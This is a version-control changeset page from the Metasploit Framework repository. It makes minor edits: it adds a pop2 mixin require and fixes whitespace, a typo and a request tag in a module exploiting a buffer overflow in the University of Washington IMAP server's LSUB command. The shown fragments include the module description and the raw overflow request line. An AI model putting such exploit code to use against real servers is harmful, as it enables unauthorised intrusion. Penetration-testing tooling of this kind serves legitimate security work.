Changeset 5550

Show
Ignore:
Timestamp:
07/08/08 09:21:48 (3 months ago)
Author:
patrickw
Message:

Added pop2 mixin, aux module, typos.

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved
  • framework3/trunk/lib/msf/core/exploit.rb

    r5132 r5550  
    237237        require 'msf/core/exploit/imap' 
    238238        require 'msf/core/exploit/smtp_deliver' 
     239        require 'msf/core/exploit/pop2' 
    239240         
    240241        # Networks 
  • framework3/trunk/modules/exploits/linux/imap/imap_uw_lsub.rb

    r5549 r5550  
    1515module Msf 
    1616 
    17        class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote 
     17class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote 
    1818 
    1919        include Exploit::Remote::Imap 
     
    2424                        'Description'    => %q{ 
    2525                                This module exploits a buffer overflow in the 'LSUB' 
    26                                 command of the the University of Washington IMAP service. 
     26                                command of the University of Washington IMAP service. 
    2727                                This vulnerability can only be exploited with a valid username 
    2828                                and password. 
     
    7373 
    7474                print_status("Sending overflow string...") 
    75                 req = "a001 LSUB \"\" {1064}\r\n" 
     75                req = "a002 LSUB \"\" {1064}\r\n" 
    7676                sock.put(req) 
    7777                sleep(2)